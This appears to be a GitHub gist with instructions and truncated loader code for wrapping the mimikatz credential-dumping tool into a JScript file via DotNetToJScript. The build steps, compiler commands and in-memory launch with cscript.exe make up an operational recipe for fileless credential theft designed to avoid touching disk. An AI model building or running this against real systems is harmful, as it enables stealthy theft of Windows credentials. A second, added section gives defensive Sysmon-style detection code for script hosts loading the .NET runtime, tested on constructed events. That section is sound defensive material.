Forked from pljoel/Instructions-to-mimikatz-js.txt
Created November 25, 2019 10:46
mimikatz 2.1.1 in javascript
It is basically a wrapper around the following projects:
- mimikatz (https://github.com/gentilkiwi/mimikatz)
- mimikatz in .NET by Casey Smith (https://gist.github.com/caseysmithrc/87f6572547f633f13a8482a0c91fb7b7)
  Updated from 2.0.0 to 2.1.1 (https://gist.github.com/pljoel/410eeebcaf118b9ac8b8f2b40fd5e863)
- DotNetToJScript (https://github.com/tyranid/DotNetToJScript)

INSTRUCTIONS:
1. Grab the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases
2. a) Uncomment the building lines from Casey's project in Delivery.Program.Main() (you may want to comment out the Exec() line, though)
   b) It is going to produce a file.b64; copy its content and replace the Delivery.Package.file string with it
   c) Comment the file.b64 building lines back out
   d) To give DotNetToJScript an entry point (by default it instantiates a class named TestClass, so its constructor is what runs), add the following lines to the end of katz.cs:
      public class TestClass
      {
          public TestClass()
          {
              /* Start katz */
              Delivery.Program.Main();
          }
      }
   e) Make an .exe:
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /unsafe katz.cs
3. a) Build the DotNetToJScript project. Note: you don't need to build the 'ExampleAssembly' project
   b) Create mimikatz.js using the DotNetToJScript you just built and the katz.exe you built in step 2:
      C:\< path to DotNetToJScript >\DotNetToJScript.exe -o mimikatz.js -ver auto C:\< path to katz >\katz.exe
4. Launch mimikatz in memory using JavaScript (nothing but the .js touches disk; the serialized assembly is decoded and loaded inside the script host process):
   cscript.exe .\mimikatz.js

Joel Perron-Langlois (github: https://github.com/pljoel)
mimikatz.js (truncated on the page; only the first lines are shown)
function setversion() {
    // Pin the CLR version the script host will load: prefer .NET 4 if its
    // registry key exists, otherwise fall back to .NET 2.0.
    var shell = new ActiveXObject('WScript.Shell');
    var ver = 'v4.0.30319';
    try {
        shell.RegRead('HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\');
    } catch (e) {
        ver = 'v2.0.50727';
    }
    // COMPLUS_Version is honoured by the CLR shim when the runtime is first
    // loaded into this process, so it must be set before any System.* object
    // is created below.
    shell.Environment('Process')('COMPLUS_Version') = ver;
}

function debug(s) { WScript.Echo(s); }

// Decode a base64 string into a .NET MemoryStream using .NET classes exposed
// through COM. Creating the first of these ActiveXObjects is what loads the
// CLR into cscript.exe / wscript.exe. The _2 / _4 suffixes are how COM
// exposes overloaded .NET methods (GetByteCount(string), GetBytes(string)).
function base64ToStream(b) {
    var enc = new ActiveXObject("System.Text.ASCIIEncoding");
    var length = enc.GetByteCount_2(b);
    var ba = enc.GetBytes_4(b);
    var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
    ba = transform.TransformFinalBlock(ba, 0, length);
    var ms = new ActiveXObject("System.IO.MemoryStream");
    // (length / 4) * 3 is the decoded size of unpadded base64 input.
    ms.Write(ba, 0, (length / 4) * 3);
    ms.Position = 0;
    return ms;
}
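The observable side of the technique above (step 4 and the System.* ActiveXObject calls in mimikatz.js) is a Windows Script Host process pulling the .NET runtime into itself, which cscript.exe and wscript.exe never do on their own. The following detection logic is an added example and is not code from the gist, from DotNetToJScript or from mimikatz. It assumes Sysmon-shaped events (EventID 1 process create with Image, CommandLine and ProcessGuid; EventID 7 image load with Image, ImageLoaded and ProcessGuid); the events it runs over are constructed here, not real telemetry. The CLR image names it matches are mscoree.dll (the shim that honours COMPLUS_Version), clr.dll (the v4.0.30319 runtime) and mscorwks.dll (the v2.0.50727 fallback).

```javascript
// Added example, not part of the gist or of DotNetToJScript: flag a script host
// (cscript.exe / wscript.exe) that loads the .NET CLR, which is what the
// System.* ActiveXObject calls in mimikatz.js cause.
// Assumed event shape: Sysmon-like EventID 1 (process create) and EventID 7 (image load).

const SCRIPT_HOSTS = new Set(['cscript.exe', 'wscript.exe']);
// mscoree.dll = CLR shim, clr.dll = .NET 4 runtime, mscorwks.dll = .NET 2.0 runtime.
const CLR_IMAGES = new Set(['mscoree.dll', 'clr.dll', 'mscorwks.dll']);

function baseName(path) {
  return String(path || '').split(/[\\/]/).pop().toLowerCase();
}

// Pull the .js argument out of a command line such as "cscript.exe .\mimikatz.js".
function scriptFromCommandLine(cmd) {
  const m = /(\S+\.js)(?=\s|$)/i.exec(cmd || '');
  return m ? m[1] : null;
}

function findClrInScriptHost(events) {
  const creates = new Map(); // ProcessGuid -> EventID 1 record, kept for the command line
  const alerts = new Map();  // one alert per process, keyed by ProcessGuid
  for (const e of events) {
    if (e.EventID === 1) {
      if (SCRIPT_HOSTS.has(baseName(e.Image))) creates.set(e.ProcessGuid, e);
      continue;
    }
    if (e.EventID !== 7) continue;
    // The decision is made on the image-load event alone: the loading process
    // must be a script host. powershell.exe loading clr.dll is normal and is skipped.
    if (!SCRIPT_HOSTS.has(baseName(e.Image))) continue;
    if (!CLR_IMAGES.has(baseName(e.ImageLoaded))) continue;
    if (alerts.has(e.ProcessGuid)) continue;
    const c = creates.get(e.ProcessGuid); // may be missing if the sensor saw only the load
    alerts.set(e.ProcessGuid, {
      ProcessGuid: e.ProcessGuid,
      Image: e.Image,
      ImageLoaded: e.ImageLoaded,
      CommandLine: c ? c.CommandLine : null,
      Script: c ? scriptFromCommandLine(c.CommandLine) : null,
    });
  }
  return Array.from(alerts.values());
}

// Constructed sample events (not real telemetry).
const SAMPLE_EVENTS = [
  { EventID: 1, ProcessGuid: 'A', Image: 'C:\\Windows\\System32\\cscript.exe', CommandLine: 'cscript.exe .\\mimikatz.js' },
  { EventID: 7, ProcessGuid: 'A', Image: 'C:\\Windows\\System32\\cscript.exe', ImageLoaded: 'C:\\Windows\\System32\\jscript.dll' },
  { EventID: 7, ProcessGuid: 'A', Image: 'C:\\Windows\\System32\\cscript.exe', ImageLoaded: 'C:\\Windows\\System32\\mscoree.dll' },
  { EventID: 7, ProcessGuid: 'A', Image: 'C:\\Windows\\System32\\cscript.exe', ImageLoaded: 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll' },
  // A PowerShell process loads the CLR legitimately and must not alert.
  { EventID: 1, ProcessGuid: 'B', Image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', CommandLine: 'powershell.exe -NoProfile' },
  { EventID: 7, ProcessGuid: 'B', Image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', ImageLoaded: 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll' },
  // Image load seen without its process-create event (sensor started late): still alerts, without a command line.
  { EventID: 7, ProcessGuid: 'C', Image: 'C:\\Windows\\SysWOW64\\wscript.exe', ImageLoaded: 'C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll' },
];

console.log(JSON.stringify(findClrInScriptHost(SAMPLE_EVENTS), null, 2));
```

On the sample above this yields two alerts: process A (cscript.exe running .\mimikatz.js, first CLR image mscoree.dll) and process C (wscript.exe with the .NET 2.0 runtime, command line unknown). The COMPLUS_Version variable that setversion() writes lives only in the script host's own process environment and is not something process-creation telemetry records, so the image load, not the variable, is the thing to key on; the registry read of HKLM\SOFTWARE\Microsoft\.NETFramework\v4.0.30319 is a weaker secondary signal if registry auditing is on.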